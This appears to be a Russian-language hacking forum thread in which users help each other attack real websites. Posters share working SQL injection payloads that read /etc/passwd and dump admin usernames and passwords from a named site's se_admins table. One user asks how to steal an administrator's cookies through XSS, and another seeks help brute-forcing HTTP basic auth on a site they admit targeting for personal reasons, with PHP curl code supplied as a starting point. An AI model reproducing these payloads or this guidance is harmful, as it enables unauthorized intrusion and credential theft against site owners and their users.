Ваши вопросы по уязвимостям.

Попробуй

load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100))

 

Из прошлого запроса видно что ковычка не фильтруется.

 

на encode не пробовал
заменив "+" на "%2B"
скорее всего причина в этом

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--

 

2 pinch

nea,тот же результат =(

 

интересно может ссылку дашь....

 

в личку

 

А мне кто поможет?

 

Создавать то создавал, но потом в описании раздела увидел, что нельзя, через день удалили тред.

Кинули ссылку на ман по тому как сделать, а я пока скорее нахожусь на уровне скрипт - кидди)

Из википедии понял только что шифрование на Base64, никаких уязвимостей там не написано.

ЗЫ: мой вопрос на странице 1293

 

Подскажите как вытащить cookies с сайта, есть XSS уязвимость, задача вытащить cookies админа, испробавала пока на себе (document.cookie(JS)) нормально вытаскивает и записывает но одна проблема всего 4 значения а их там 6... т.е не все полностью тащит, есть еще какие то варианты?

 

Оказывается надо было просто аворитизироваться, и появится все параметры, вопрос закрыт

 

Исправьте запрос, никак не могу вывести таблицу
http://blocked/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins

 

Code:

http://ping.ua/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+and+(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,admin_username,admin_password)+from+se_admins+limit+0,1),floor(rand(0)*2))+from+se_admins+group+by+2)a)--+

последняя единичка в каждом результате лишняя

 

а как узнать куда его заливать. те где находятся файлы сайта

 

Ап

 

ReckouNT забей..

 

ReckouNT, увы но бесик авторизацию ты не обойдешь. Только брутом.

 

Не могу, к данному сайту личный интерес. К тому же там большая база юзверей и он самописный, дырок должно быть дофига.

Очень жаль, я надеялся что к такому старому способу что либо придумали. Брут там использовать очень легко.
Ладно, придется либо брутить, либо искать новую уязвимость.
=======
Да, и кстати: как можно просмотреть исходный код страницы при вылетающем окне? В фф и осле просмотреть не могу, т.к. мигает окно логинпасса по причине что не ввел данные.

На странице неудачи входа он меняется. Нужно посмотреть, какие имена присвоены полям, для настройки брута.

 

unhex(hex(admin_username))
aes_descrypt(aes_encrypt(admin_username,12),12)
или таблица находится в другой бд.

 

ты хоть сам то понял что написал?

 

А никак ты это не сделаешь, там формы как таковой нету. Вот пример http авторизации на пхп

PHP:

<?php
$result = http_auth('http://site.ru/admin/','username','password');
echo $result;

function http_auth($url,$login,$password) {
$ch = curl_init($url);    
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   
 curl_setopt($ch, CURLOPT_USERPWD, $login.":".$password);   
$result = curl_exec($ch);   
 return $result;
}

?>


ну а с брутом там сам разбирайся, не думаю что это сложно.